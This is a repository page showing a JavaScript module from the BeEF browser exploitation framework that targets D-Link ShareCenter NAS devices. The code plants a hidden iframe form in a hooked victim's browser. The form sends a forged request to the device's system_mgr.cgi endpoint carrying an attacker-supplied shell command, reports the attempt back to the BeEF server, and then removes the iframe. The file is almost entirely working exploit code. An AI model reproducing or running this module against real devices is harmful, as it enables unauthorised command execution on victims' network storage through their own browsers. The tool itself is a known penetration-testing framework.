Hiddenden/beef
2
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
master
beef/modules/exploits/nas/dlink_sharecenter_cmd_exec/command.js
zinduolis 95793433fa Update copyright year to 2026
2025-12-26 19:18:05 +10:00

28 lines
873 B
JavaScript
Raw Permalink Blame History

//
// Copyright (c) 2006-2026Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - https://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
beef.execute(function() {
var gateway = '<%= @base %>';
var path = '/cgi-bin/system_mgr.cgi';
var cmd = '<%= @cmd.gsub(/'/, "\\\'").gsub(/"/, '\\\"') %>';
var timeout = 15;
var dlink_sharecenter_iframe_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + path, "GET", "application/x-www-form-urlencoded", [
{'type':'hidden', 'name':'cmd', 'value':'cgi_sms_test'},
{'type':'hidden', 'name':'command1', 'value':cmd}
]);
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
cleanup = function() {
document.body.removeChild(dlink_sharecenter_iframe_<%= @command_id %>);
}
setTimeout("cleanup()", timeout*1000);
});
Reference in New Issue View Git Blame Copy Permalink